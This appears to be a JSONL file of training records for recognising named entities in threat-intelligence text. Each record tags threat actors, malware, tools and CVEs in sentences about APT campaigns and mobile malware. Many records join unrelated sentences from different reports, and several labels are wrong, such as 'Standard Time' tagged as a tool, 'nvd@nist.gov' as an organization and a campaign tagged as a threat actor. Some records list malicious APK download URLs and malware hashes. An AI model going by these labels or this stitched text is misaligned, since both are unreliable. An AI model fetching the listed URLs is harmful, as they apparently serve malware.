{"text": "The most recent attacks focusing on the chemical industry are using password-protected 7zip files which , when extracted , contain a self-extracting executable .", "spans": {"TOOL: 7zip": [[87, 91]]}, "info": {"id": "cyberner_stix_train_007403", "source": "cyberner_stix_train"}} {"text": "The first evidence of its intrusion dated from May 6 , 2015 but activity appeared to have begun in earnest on May 12 . They are often targeted simultaneously with other ethnic minorities and religious groups in China .", "spans": {"ORGANIZATION: ethnic minorities": [[169, 186]], "ORGANIZATION: religious groups": [[191, 207]]}, "info": {"id": "cyberner_stix_train_007404", "source": "cyberner_stix_train"}} {"text": "Figure 4 : Loader calls initialization method Technical Analysis – Core Module With the main purpose of spreading the infection , “ Agent Smith ” implements in the “ core ” module : A series of ‘ Bundle ’ vulnerabilities , which is used to install applications without the victim ’ s awareness . If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros . These legitimate system processes include msiexec.exe ( for installing MSI packages ) , unzIP . 
During the SolarWinds Compromise , APT29 gained access through compromised accounts at cloud solution partners , and used compromised certificates issued by Mimecast to authenticate to Mimecast customer systems .", "spans": {"MALWARE: Agent Smith": [[132, 143]], "VULNERABILITY: Bundle": [[196, 202]], "MALWARE: document": [[303, 311]], "VULNERABILITY: CVE-2012-0158": [[360, 373]], "VULNERABILITY: CVE-2013-3906": [[376, 389]], "VULNERABILITY: CVE-2014-1761": [[393, 406]], "FILEPATH: msiexec.exe": [[516, 527]], "TOOL: MSI": [[545, 548]], "TOOL: unzIP": [[562, 567]], "THREAT_ACTOR: the SolarWinds Compromise": [[577, 602]], "THREAT_ACTOR: APT29": [[605, 610]]}, "info": {"id": "cyberner_stix_train_007405", "source": "cyberner_stix_train"}} {"text": "Alternatively , OnionDuke also steals user credentials from its victims , providing another potential revenue source .", "spans": {"MALWARE: OnionDuke": [[16, 25]]}, "info": {"id": "cyberner_stix_train_007406", "source": "cyberner_stix_train"}} {"text": "While investigating a 2016 intrusion , Secureworks incident responders identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization . One big unknown was the infection vector for Turla ( aka Snake or Uroburos ) .", "spans": {"ORGANIZATION: Secureworks": [[39, 50]], "THREAT_ACTOR: BRONZE BUTLER": [[82, 95]], "VULNERABILITY: CVE-2016-7836": [[162, 175]], "THREAT_ACTOR: Turla": [[307, 312]], "THREAT_ACTOR: Snake": [[319, 324]], "THREAT_ACTOR: Uroburos": [[328, 336]]}, "info": {"id": "cyberner_stix_train_007407", "source": "cyberner_stix_train"}} {"text": "It was also used in limited attacks in Korea and Japan . The Cobalt group misused Cobalt Strike , for instance , to perpetrate ATM cyber heists and target financial institutions across Europe , and interestingly , Russia . 
Originally the code called the optblock_t : :f unc callback in MMAT_GLBOPT1 and MMAT_GLBOPT2 , By analyzing the source code , researchers can identify similar patterns and techniques used by different threat actors , providing defenders with a way to proactively detect and block the new variants at the initial stage of an attack .", "spans": {"THREAT_ACTOR: Cobalt group": [[61, 73]], "TOOL: Cobalt Strike": [[82, 95]], "THREAT_ACTOR: cyber heists": [[131, 143]], "ORGANIZATION: financial institutions": [[155, 177]], "TOOL: optblock_t : :f unc": [[254, 273]], "TOOL: MMAT_GLBOPT1": [[286, 298]], "TOOL: MMAT_GLBOPT2": [[303, 315]]}, "info": {"id": "cyberner_stix_train_007408", "source": "cyberner_stix_train"}} {"text": "WRITE_SMS - Allows the application to write to SMS messages stored on the device or SIM card , including y deleting messages . This tool was previously observed during a Mandiant incident response in 2018 and , to date , solely utilized by APT34 . Starting in mid-February , Unit 42 researchers have been tracking an active campaign sharing a significant portion of infrastructure leveraged by Gorgon Group for criminal and targeted attacks .", "spans": {"TOOL: tool": [[132, 136]], "THREAT_ACTOR: APT34": [[240, 245]], "ORGANIZATION: Unit 42": [[275, 282]], "THREAT_ACTOR: Gorgon Group": [[394, 406]]}, "info": {"id": "cyberner_stix_train_007409", "source": "cyberner_stix_train"}} {"text": "Employ stronger credentials , for instance , to make them less susceptible to unauthorized access . In recent years , Lazarus has also become involved in financially motivated attacks . Winnti : More than just Windows and Gates .", "spans": {"THREAT_ACTOR: Lazarus": [[118, 125]], "ORGANIZATION: financially": [[154, 165]], "MALWARE: Winnti": [[186, 192]], "SYSTEM: Windows": [[210, 217]]}, "info": {"id": "cyberner_stix_train_007410", "source": "cyberner_stix_train"}} {"text": "] com overlaps with PlugX , Zupdax , and Poison Ivy malware families discussed in more detail later . 
In spring 2015 , APT41 targeted information related to two entities undergoing a merger announced the previous year . Some of APT28 's more commonly used tools are the SOURFACE downloader , its second stage backdoor EVILTOSS , and a modular family of implants that we call CHOPSTICK .", "spans": {"MALWARE: PlugX": [[20, 25]], "MALWARE: Zupdax": [[28, 34]], "MALWARE: Poison Ivy": [[41, 51]], "THREAT_ACTOR: APT41": [[119, 124]], "THREAT_ACTOR: APT28": [[228, 233]], "MALWARE: SOURFACE downloader": [[270, 289]], "MALWARE: EVILTOSS": [[318, 326]], "MALWARE: modular family of implants": [[335, 361]], "MALWARE: CHOPSTICK": [[375, 384]]}, "info": {"id": "cyberner_stix_train_007411", "source": "cyberner_stix_train"}} {"text": "Given that there are a limited number of behaviors required to identify billing fraud , Bread apps have had to try a wide variety of techniques to mask usage of these APIs . Government officials said they knew the initial attack occurred in 2011 , but are unaware of who specifically is behind the attacks . PortScan Run TCP Port MultiScanner v1.0 . Attribution to the Dukes was made partly on the LNK file structure and other TTPs , including the targets of the attack .", "spans": {"MALWARE: Bread": [[88, 93]], "ORGANIZATION: Government officials": [[174, 194]], "THREAT_ACTOR: Dukes": [[369, 374]]}, "info": {"id": "cyberner_stix_train_007412", "source": "cyberner_stix_train"}} {"text": "MainService has the following capabilities : Steal SMS messages Send SMS messages Steal the victim 's location Capture photos Execute commands Capture screenshots Call phone numbers Initiate other apps Steal Facebook credentials , etc All of the above functionalities take place on the basis of commands sent by the attacker . During this attack , the Bemstour exploit tool was delivered to victims via known Buckeye malware (Backdoor.Pirpi) . 
The group likely consists of Russian pro-hacktivists .", "spans": {"SYSTEM: Facebook": [[208, 216]], "TOOL: Buckeye malware": [[409, 424]]}, "info": {"id": "cyberner_stix_train_007413", "source": "cyberner_stix_train"}} {"text": "In my previous blog I posted details of a cyber attack targeting Indian government organizations .", "spans": {"ORGANIZATION: Indian government organizations": [[65, 96]]}, "info": {"id": "cyberner_stix_train_007414", "source": "cyberner_stix_train"}} {"text": "This is not the first instance of an adversary group using recent current events as a lure , but it is interesting to see this group attempt to capitalize on the attention of a catastrophic event to execute their attack .", "spans": {}, "info": {"id": "cyberner_stix_train_007416", "source": "cyberner_stix_train"}} {"text": "Indeed , Kaspersky started tracking the BlueNoroff actor a long time ago . The earliest step in any possible attack(s) involving this variant of KopiLuwak of which Proofpoint researchers are currently aware begin with the MSIL dropper .", "spans": {"ORGANIZATION: Kaspersky": [[9, 18]], "THREAT_ACTOR: BlueNoroff": [[40, 50]], "FILEPATH: KopiLuwak": [[145, 154]], "FILEPATH: MSIL dropper": [[222, 234]]}, "info": {"id": "cyberner_stix_train_007417", "source": "cyberner_stix_train"}} {"text": "During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros . We can see that the malware relies on bash shell for most of its setup .", "spans": {"THREAT_ACTOR: APT32": [[27, 32]], "MALWARE: Microsoft ActiveMime file": [[74, 99]], "MALWARE: malware": [[162, 169]]}, "info": {"id": "cyberner_stix_train_007418", "source": "cyberner_stix_train"}} {"text": "In our tests , the malware sample was able to easily detect both VMWare and Hyper-V environments through the detection of the virtualized peripherals ( for example , Vmware has VEN_15AD as vendor ID , HyperV has VMBus as bus name ) . 
FireEye asesses that APT32 actors may be aligned with the national interests of Vietnam . It arrives together with an encrypted payload stored in a separate .png image file . Data transfer to a thirdparty tool may be authorized , but it may not be common practice to continuously ping internal servers for external data transfer requests .", "spans": {"SYSTEM: VMWare": [[65, 71]], "SYSTEM: Hyper-V": [[76, 83]], "ORGANIZATION: Vmware": [[166, 172]], "ORGANIZATION: FireEye": [[234, 241]], "THREAT_ACTOR: APT32 actors": [[255, 267]]}, "info": {"id": "cyberner_stix_train_007419", "source": "cyberner_stix_train"}} {"text": "Responder facilitates NetBIOS Name Service ( NBT-NS ) poisoning .", "spans": {"TOOL: Responder": [[0, 9]], "TOOL: NetBIOS Name Service": [[22, 42]], "TOOL: NBT-NS": [[45, 51]]}, "info": {"id": "cyberner_stix_train_007420", "source": "cyberner_stix_train"}} {"text": "This corresponds to working hours between 9am and 7pm in the UTC+3 time zone , also known as Moscow Standard Time , which covers , among others , much of western Russia , including Moscow and St. Petersburg .", "spans": {"TOOL: Standard Time": [[100, 113]]}, "info": {"id": "cyberner_stix_train_007421", "source": "cyberner_stix_train"}} {"text": "Remove unnecessary HTTP verbs from web servers .", "spans": {"TOOL: web servers": [[35, 46]]}, "info": {"id": "cyberner_stix_train_007422", "source": "cyberner_stix_train"}} {"text": "So the system doesn ’ t see any strange processes running and thus does not cry the alarm . The other one , \" Operation Erebus \" employs an older exploit , for CVE-2016-4117 and leverages watering holes . 
The registrant information for kernel.ws also provided a geolocation of Tehran , IR and the email provider for the address used in checkgoogle.org was the same used for mydomain1607.com , chmail.ir .", "spans": {"VULNERABILITY: CVE-2016-4117": [[160, 173]], "ORGANIZATION: email provider": [[297, 311]]}, "info": {"id": "cyberner_stix_train_007423", "source": "cyberner_stix_train"}} {"text": "Malicious URL Referrer Dates http : //217.194.13.133/tre/internet/Configuratore_3.apk http : //217.194.13.133/tre/internet/ 2015-02-04 to present time http : //217.194.13.133/appPro_AC.apk – 2015-07-01 http : //217.194.13.133/190/configurazione/vodafone/smartphone/VODAFONE % 20Configuratore % 20v5_4_2.apk http : //217.194.13.133/190/configurazione/vodafone/smartphone/index.html In order to understand SWAnalytics’ impact , we turned to public download volume data available on Chandashi , one of the app store optimization vendors specialized in Chinese mobile application markets . APT1 : Comment Crew , Comment Group , Comment Panda .", "spans": {"MALWARE: SWAnalytics’": [[404, 416]], "THREAT_ACTOR: APT1": [[586, 590]], "THREAT_ACTOR: Comment Crew": [[593, 605]], "THREAT_ACTOR: Comment Group": [[608, 621]], "THREAT_ACTOR: Comment Panda": [[624, 637]]}, "info": {"id": "cyberner_stix_train_007424", "source": "cyberner_stix_train"}} {"text": "This story is about one of those cases .", "spans": {}, "info": {"id": "cyberner_stix_train_007425", "source": "cyberner_stix_train"}} {"text": "This particular threat was also used by hackers to compromise a Korean social network site to steal records of 35 million users .", "spans": {}, "info": {"id": "cyberner_stix_train_007426", "source": "cyberner_stix_train"}} {"text": "https : //github.com/El3ct71k/Keylogger/ It appears the developers have copied the functional part of the keylogger module from this project . Operation Sheep is the first campaign we have observed in the wild that abuses similar concept since our MitD publication . 
Machete is a group that has been active since at least 2010 , targeting high-profile government entities in Latin American countries .", "spans": {"THREAT_ACTOR: Operation Sheep": [[143, 158]], "THREAT_ACTOR: Machete": [[267, 274]]}, "info": {"id": "cyberner_stix_train_007427", "source": "cyberner_stix_train"}} {"text": "After the attackers successfully exploited the employee ’s system , they gained access to the e-commerce company 's internal network .", "spans": {}, "info": {"id": "cyberner_stix_train_007429", "source": "cyberner_stix_train"}} {"text": "Most legitimate Android apps are available on the Google Play Store . Once BARIUM has established rapport , they spear-phish the victim using a variety of unsophisticated malware installation vectors , including malicious shortcut ( .lnk ) files with hidden payloads , compiled HTML help ( .chm ) files , or Microsoft Office documents containing macros or exploits . The download name was \" Zawgyi_Keyboard_L.zip \" , and it dropped a \" setup.exe \" that contained several backdoor components , including an Elise \" wincex.dll \" ( a42c966e26f3577534d03248551232f3 , detected as Backdoor.Win32.Agent.delp ) .", "spans": {"SYSTEM: Android": [[16, 23]], "SYSTEM: Google Play Store": [[50, 67]], "TOOL: unsophisticated malware": [[155, 178]], "TOOL: malicious shortcut": [[212, 230]], "MALWARE: .lnk": [[233, 237]], "TOOL: HTML help ( .chm ) files": [[278, 302]], "TOOL: Microsoft Office documents": [[308, 334]], "FILEPATH: Zawgyi_Keyboard_L.zip": [[391, 412]], "FILEPATH: setup.exe": [[436, 445]], "MALWARE: Elise": [[506, 511]], "FILEPATH: wincex.dll": [[514, 524]], "FILEPATH: a42c966e26f3577534d03248551232f3": [[529, 561]], "MALWARE: Backdoor.Win32.Agent.delp": [[576, 601]]}, "info": {"id": "cyberner_stix_train_007430", "source": "cyberner_stix_train"}} {"text": "At the same time , the domain admin.nslookupdns [ . Once in a victim organization , APT41 can leverage more sophisticated TTPs and deploy additional malware . 
Since at least 2014 , FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam 's manufacturing , consumer products , and hospitality sectors .", "spans": {"THREAT_ACTOR: APT41": [[84, 89]], "ORGANIZATION: FireEye": [[181, 188]], "THREAT_ACTOR: APT32": [[202, 207]], "ORGANIZATION: foreign corporations": [[218, 238]], "ORGANIZATION: manufacturing": [[276, 289]], "ORGANIZATION: consumer products": [[292, 309]], "ORGANIZATION: hospitality sectors": [[316, 335]]}, "info": {"id": "cyberner_stix_train_007431", "source": "cyberner_stix_train"}} {"text": "This indicates that the app tries to hide itself from any anti-PHA systems that look for a specific app process name or does not have the ability to scan the memory of the system_server process . The Sogu gang , in contrast , use PDF and DOC files in very tailored , targeted emails . BLACKCOFFEE ’s functionality includes uploading and downloading files ; creating a reverse shell ; enumerating files and processes ; renaming , moving , and deleting files ; terminating processes ; and expanding its functionality by adding new backdoor commands . The PDFs were highly relevant and well - crafted content that fabricated human rights seminar information ( ASEM ) and Ukraine - s foreign policy and NATO membership plans .", "spans": {"TOOL: PDF": [[230, 233]], "TOOL: DOC files": [[238, 247]], "MALWARE: BLACKCOFFEE": [[285, 296]]}, "info": {"id": "cyberner_stix_train_007432", "source": "cyberner_stix_train"}} {"text": "CraP2P has frequently been used to distribute other malware such as Locky and Dridex , but also supported large scale spam campaigns for dating advertisement and pump-and-dump scams after the demise of Kelihos . 
While investigating a 2016 intrusion , Secureworks incident responders identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization .", "spans": {"MALWARE: CraP2P": [[0, 6]], "TOOL: Locky": [[68, 73]], "TOOL: Dridex": [[78, 84]], "ORGANIZATION: Secureworks": [[251, 262]], "THREAT_ACTOR: BRONZE BUTLER": [[294, 307]], "VULNERABILITY: CVE-2016-7836": [[374, 387]]}, "info": {"id": "cyberner_stix_train_007433", "source": "cyberner_stix_train"}} {"text": "Release_Time : 2015-09", "spans": {}, "info": {"id": "cyberner_stix_train_007434", "source": "cyberner_stix_train"}} {"text": "This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx” . LuckyMouse , also known as Iron Tiger , EmissaryPanda , APT 27 and Threat Group-3390 , is the same group of Chinese hackers who was found targeting Asian countries with Bitcoin mining malware early this year .", "spans": {"MALWARE: document": [[34, 42]], "VULNERABILITY: Trump's_Attack_on_Syria_English.docx”": [[49, 86]], "THREAT_ACTOR: LuckyMouse": [[89, 99]], "THREAT_ACTOR: Iron Tiger": [[116, 126]], "THREAT_ACTOR: EmissaryPanda": [[129, 142]], "THREAT_ACTOR: APT 27": [[145, 151]], "THREAT_ACTOR: Threat Group-3390": [[156, 173]], "MALWARE: Bitcoin mining malware": [[258, 280]]}, "info": {"id": "cyberner_stix_train_007435", "source": "cyberner_stix_train"}} {"text": "At the time of detection , observed BRONZE PRESIDENT incidents had likely been ongoing for several months or even years .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[36, 52]]}, "info": {"id": "cyberner_stix_train_007436", "source": "cyberner_stix_train"}} {"text": "CTU researchers assess with moderate confidence that TG-3390 is based in the People's Republic of China .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: TG-3390": [[53, 60]], "ORGANIZATION: People's Republic": [[77, 94]]}, "info": {"id": 
"cyberner_stix_train_007437", "source": "cyberner_stix_train"}} {"text": "Without context , this method does not reveal much about its intended behavior , and there are no calls made to it anywhere in the DEX . In June we published on a previously unknown group we named \" Bahamut \" , a strange campaign of phishing and malware apparently focused on the Middle East and South Asia . Further , the keylogging and remote desktop functionality allows the operator to spy on the infected machine , observing all keystrokes and viewing all user actions . It allows security researchers to analyze the source code and understand the attacker ’s tactics , techniques and procedures ( TTPs ) , which helps security professionals develop effective detection rules and enhance security products ' capabilities in combating ransomware threats .", "spans": {"THREAT_ACTOR: Bahamut": [[199, 206]]}, "info": {"id": "cyberner_stix_train_007438", "source": "cyberner_stix_train"}} {"text": "Sofacy AZZY 4.3 dropper analysis File format : PE32 EXE File size : 142,336 bytes MD5: c3ae4a37094ecfe95c2badecf40bf5bb Linker version : 11.0 , Microsoft Visual Studio Linker timestamp : 2015.02.10 10:01:59 ( GMT ) Most of the strings and data in the file are encrypted using 3DES and XOR .", "spans": {"THREAT_ACTOR: Sofacy": [[0, 6]], "MALWARE: AZZY": [[7, 11]], "TOOL: EXE": [[52, 55]], "FILEPATH: c3ae4a37094ecfe95c2badecf40bf5bb": [[87, 119]], "ORGANIZATION: Microsoft": [[144, 153]], "TOOL: Visual Studio": [[154, 167]], "TOOL: GMT": [[209, 212]]}, "info": {"id": "cyberner_stix_train_007439", "source": "cyberner_stix_train"}} {"text": "If an automated sandbox exits its analysis session without specifically closing out the document , the sandbox may miss the malicious activity entirely .", "spans": {}, "info": {"id": "cyberner_stix_train_007440", "source": "cyberner_stix_train"}} {"text": "Incident Background Beginning on Oct. 
24 at 08:00 UTC , FireEye detected and blocked attempts to infect multiple clients with a drive-by download masquerading as a Flash Update install_flash_player.exe that delivered a wormable variant of ransomware . The HTA files contained job descriptions and links to job postings on popular employment websites .", "spans": {"ORGANIZATION: FireEye": [[56, 63]], "MALWARE: install_flash_player.exe": [[177, 201]], "MALWARE: ransomware": [[239, 249]], "FILEPATH: HTA files": [[256, 265]]}, "info": {"id": "cyberner_stix_train_007441", "source": "cyberner_stix_train"}} {"text": "Users are recommended to install apps from authorized stores such as Google Play , disable installation of apps from 'Unknown Sources ' and for a better security install a reputed security application . According to 360 Threat Intelligence Center , Goldmouse was observed deploying the nebulous njRAT backdoor . Beachhead backdoors are typically minimally featured . They 're mostly located in South East Asia , but are also in the US , Germany , Japan , China , Russia , Brazil , Peru , and Belarus , according to a release published Thursday by researchers from antivirus provider Kaspersky Lab .", "spans": {"SYSTEM: Google Play": [[69, 80]], "ORGANIZATION: 360 Threat Intelligence Center": [[216, 246]], "TOOL: njRAT backdoor": [[295, 309]], "ORGANIZATION: antivirus provider": [[564, 582]], "ORGANIZATION: Kaspersky Lab": [[583, 596]]}, "info": {"id": "cyberner_stix_train_007442", "source": "cyberner_stix_train"}} {"text": "As with much of the malware distributed by TA505 , The Trick has appeared in frequent , high-volume campaigns .", "spans": {"THREAT_ACTOR: TA505": [[43, 48]], "MALWARE: Trick": [[55, 60]]}, "info": {"id": "cyberner_stix_train_007443", "source": "cyberner_stix_train"}} {"text": "The contents above use the DDE functionality in Microsoft Word to run a PowerShell script to download the Koadic payload from a remote server , save it as an executable file on the system and then execute the 
payload .", "spans": {"ORGANIZATION: Microsoft": [[48, 57]], "TOOL: Word": [[58, 62]], "TOOL: PowerShell": [[72, 82]], "TOOL: Koadic": [[106, 112]]}, "info": {"id": "cyberner_stix_train_007444", "source": "cyberner_stix_train"}} {"text": "TA505 first introduced Rockloader in April 2016 as an intermediate loader for Locky .", "spans": {"THREAT_ACTOR: TA505": [[0, 5]], "MALWARE: Rockloader": [[23, 33]], "TOOL: loader": [[67, 73]], "MALWARE: Locky": [[78, 83]]}, "info": {"id": "cyberner_stix_train_007445", "source": "cyberner_stix_train"}} {"text": "We have previously detected groups we suspect are affiliated with the North Korean government compromising electric utilities in South Korea , but these compromises did not lead to a disruption of the power supply . Unit 42 recently identified a targeted attack against an individual working for the Foreign Ministry of Uzbekistan in China .", "spans": {"THREAT_ACTOR: groups": [[28, 34]], "ORGANIZATION: government": [[83, 93]], "ORGANIZATION: electric": [[107, 115]], "ORGANIZATION: Unit 42": [[216, 223]], "ORGANIZATION: Foreign Ministry": [[300, 316]]}, "info": {"id": "cyberner_stix_train_007447", "source": "cyberner_stix_train"}} {"text": "Once it infects a device , Wroba behaves very aggressively . Even an experienced user can be fooled by downloading a malicious file that is apparently from adobe.com , since the URL and the IP address correspond to Adobe 's legitimate infrastructure . It allocates a buffer of 0x2800 bytes and copies the code for the ZxGetLibAndProcAddr function . 
Instead , it appeared that corresponding requests were made directly through the Outlook Web Application ( OWA ) endpoint , indicating a previously undisclosed exploit method for Exchange .", "spans": {"MALWARE: Wroba": [[27, 32]], "MALWARE: malicious file": [[117, 131]]}, "info": {"id": "cyberner_stix_train_007448", "source": "cyberner_stix_train"}} {"text": "com.mbv.a.wp 01611e16f573da2c9dbc7acdd445d84bae71fecf2927753e341d8a5652b89a68 com.pho.nec.sg b4822eeb71c83e4aab5ddfecfb58459e5c5e10d382a2364da1c42621f58e119b Exobot ( Marcher ) - Android banking Trojan on the rise February 2017 Introduction The past months many different banking Trojans for Following their activities and evolving tactics and techniques helped us uncover the proverbial red string of fate that connected three seemingly disparate campaigns : PLEAD , Shrouded Crossbow , and of late , Waterbear . The next most common is port 53 . The operation and the key are different throughout the strings so , the best option is to emulate this part to get the decoded strings .", "spans": {"MALWARE: Exobot": [[158, 164]], "MALWARE: Marcher": [[167, 174]], "SYSTEM: Android": [[179, 186]]}, "info": {"id": "cyberner_stix_train_007449", "source": "cyberner_stix_train"}} {"text": "There were also multiple press reports of cyber-attacks on several devices during the opening ceremonies for the 2018 Olympic Games in PyeongChang .", "spans": {"ORGANIZATION: Olympic Games": [[118, 131]]}, "info": {"id": "cyberner_stix_train_007450", "source": "cyberner_stix_train"}} {"text": "We assume that these modifications were performed to avoid detection based on public IOCs .", "spans": {}, "info": {"id": "cyberner_stix_train_007451", "source": "cyberner_stix_train"}} {"text": "] 205 7ed754a802f0b6a1740a99683173db73 com.psiphon3 dexlib 2.x 188.165.49 [ . If it's Cyrillic and the command to the shell is not ‘ipconfig’ , the threat converts the command result text encoding from Cyrillic to UTF-16 . 
The final payload created by the aforementioned process is a well known backdoor , also known as ROKRAT by Cisco Talos .", "spans": {"MALWARE: it's": [[81, 85]], "TOOL: Cyrillic": [[86, 94]], "TOOL: UTF-16": [[214, 220]], "MALWARE: ROKRAT": [[320, 326]], "ORGANIZATION: Cisco Talos": [[330, 341]]}, "info": {"id": "cyberner_stix_train_007452", "source": "cyberner_stix_train"}} {"text": "Allows an application to receive SMS messages . Such is the scale of the CIA's undertaking that by 2016 , its hackers had utilized more code than that used to run Facebook . The group has targeted multiple private sector industries as well as with foreign governments , dissidents , and journalists with a strong focus on Southeast Asian countries like Vietnam , the Philippines , Laos , and Cambodia .", "spans": {"THREAT_ACTOR: hackers": [[110, 117]]}, "info": {"id": "cyberner_stix_train_007453", "source": "cyberner_stix_train"}} {"text": "The password to extract the 7zip file is included in the email .", "spans": {"TOOL: 7zip": [[28, 32]], "TOOL: email": [[57, 62]]}, "info": {"id": "cyberner_stix_train_007454", "source": "cyberner_stix_train"}} {"text": "FireEye recently observed a sophisticated campaign targeting individuals within the Mongolian government .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "ORGANIZATION: Mongolian government": [[84, 104]]}, "info": {"id": "cyberner_stix_train_007455", "source": "cyberner_stix_train"}} {"text": "MISLEADING USERS Bread apps sometimes display a pop-up to the user that implies some form of compliance or disclosure , showing terms and conditions or a confirm button . The second method , described in Part D.2 , below , involves the \" ShadowPad \" malware , which the Barium Defendants have distributed via a third-party software provider 's compromised update . Command and Control Server : Sample ( SHA256 : 1eda7e556181e46ba6e36f1a6bfe18ff5566f9d5e51c53b41d08f9459342e26c ) is configured to act as a server . 
Please address comments about this page to nvd@nist.gov .", "spans": {"MALWARE: Bread": [[17, 22]], "TOOL: ShadowPad": [[238, 247]], "THREAT_ACTOR: Barium": [[270, 276]], "ORGANIZATION: third-party software provider": [[311, 340]], "TOOL: Command and Control": [[365, 384]], "FILEPATH: 1eda7e556181e46ba6e36f1a6bfe18ff5566f9d5e51c53b41d08f9459342e26c": [[412, 476]], "ORGANIZATION: nvd@nist.gov": [[557, 569]]}, "info": {"id": "cyberner_stix_train_007456", "source": "cyberner_stix_train"}} {"text": "The grabScreenPin method has separate conditioning to handle screen lock events in Samsung devices . The malware starts communicating with the C&C server by sending basic information about the infected machine . The survey contained macros that , once enabled , downloaded PupyRAT .", "spans": {"ORGANIZATION: Samsung": [[83, 90]], "MALWARE: malware": [[105, 112]], "MALWARE: PupyRAT": [[273, 280]]}, "info": {"id": "cyberner_stix_train_007457", "source": "cyberner_stix_train"}} {"text": "“ Agent Smith ” is possibly the first campaign seen that ingrates and weaponized all these loopholes and are described in detail below . The developers of Bookworm have gone to great lengths to create a modular framework that is very flexible through its ability to run additional modules directly from its C2 server . Intent was clearly espionage in many cases , going outside of that \"lawful surveillance\" boundary.— Brian Bartholomew ( @Mao_Ware ) October 16, 2017 Brian Bartholomew , a senior security researcher with Kaspersky , said on Twitter that BlackOasis ’ espionage included non-traditional targets — “ going outside of that lawful surveillance boundary. 
” RTM used Port 44443 for its VNC module .", "spans": {"MALWARE: Agent Smith": [[2, 13]], "TOOL: Bookworm": [[155, 163]], "ORGANIZATION: Kaspersky": [[522, 531]], "TOOL: Twitter": [[542, 549]], "THREAT_ACTOR: BlackOasis": [[555, 565]], "THREAT_ACTOR: RTM": [[669, 672]], "SYSTEM: VNC module": [[697, 707]]}, "info": {"id": "cyberner_stix_train_007458", "source": "cyberner_stix_train"}} {"text": "If the lateral movement with credentials fails , then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue , and uses it to spread to that host . This confirms the actors are using Poison Ivy as part of their toolkit , something speculated in the original Trend Micro report but not confirmed by them .", "spans": {"TOOL: PingCastle MS17-010": [[71, 90]], "VULNERABILITY: EternalBlue": [[218, 229]], "MALWARE: Poison Ivy": [[304, 314]], "ORGANIZATION: Trend Micro": [[379, 390]]}, "info": {"id": "cyberner_stix_train_007459", "source": "cyberner_stix_train"}} {"text": "Known for hijacking prominent social media accounts , the self-styled white hat hacking group OurMine took over a number of verified Twitter and Facebook accounts belonging to the cable network . 
In the same year , Silence conducted DDoS attacks using the Perl IRC bot and public IRC chats to control Trojans .", "spans": {"ORGANIZATION: social media": [[30, 42]], "ORGANIZATION: Twitter": [[133, 140]], "ORGANIZATION: Facebook": [[145, 153]], "MALWARE: Perl IRC bot": [[256, 268]], "MALWARE: public IRC chats": [[273, 289]]}, "info": {"id": "cyberner_stix_train_007460", "source": "cyberner_stix_train"}} {"text": "The bitreeview.aspx file is a variant of the AntSword webshell that has undeniably similar traits as the infamous China Chopper webshell .", "spans": {"FILEPATH: bitreeview.aspx": [[4, 19]], "TOOL: AntSword": [[45, 53]], "TOOL: Chopper": [[120, 127]]}, "info": {"id": "cyberner_stix_train_007461", "source": "cyberner_stix_train"}} {"text": "Winexe is software similar to the more popular PSExec and is designed to allow system administrators to execute commands on remote servers .", "spans": {"TOOL: Winexe": [[0, 6]], "TOOL: PSExec": [[47, 53]]}, "info": {"id": "cyberner_stix_train_007462", "source": "cyberner_stix_train"}} {"text": "KrebsOnSecurity was first made aware of the metadata in the Shadow Brokers leak by Mike Poor , Rob Curtinseufert , and Larry Pesce . 
A preliminary analysis caught the attention of our Threat Analysis and Intelligence team as it yielded interesting data that , among other things , shows that Silence was targeting employees from financial entities , specifically in the Russian Federation and the Republic of Belarus .", "spans": {"ORGANIZATION: KrebsOnSecurity": [[0, 15]], "THREAT_ACTOR: Shadow Brokers": [[60, 74]], "ORGANIZATION: employees": [[314, 323]], "ORGANIZATION: financial entities": [[329, 347]]}, "info": {"id": "cyberner_stix_train_007463", "source": "cyberner_stix_train"}} {"text": "Figure 8 shows a Sysdriver scheduled task that periodically executes a Cobalt Strike payload .", "spans": {"TOOL: Cobalt Strike": [[71, 84]]}, "info": {"id": "cyberner_stix_train_007464", "source": "cyberner_stix_train"}} {"text": "It uses the same trick to prevent the smartphone from being returned to its factory settings . this attack against a Kaspersky Lab user on August 5 , 2014 . The following paper is a technical analysis on the functionality of ZxShell . In the case of a traditional ProxyNotShell exploit chain , the attack sequence is done in two steps :", "spans": {"ORGANIZATION: Kaspersky Lab": [[117, 130]], "MALWARE: ZxShell": [[225, 232]]}, "info": {"id": "cyberner_stix_train_007465", "source": "cyberner_stix_train"}} {"text": "Serial Number : 0x6a0d1fec Issuer : CN=Sun Validity : from = Mon May 16 17:42:40 MSK 2016 to = Fri May 10 17:42:40 MSK 2041 Subject : CN=Sun 9ffc350ef94ef840728564846f2802b0 2 v2.51sun 6c246bbb40b7c6e75c60a55c0da9e2f2 2 v2.96s 7c8a12e56e3e03938788b26b84b80bd6 2 v3.09s Furthermore , the Advanced Threat Research team has discovered Proxysvc , which appears to be an undocumented implant . 
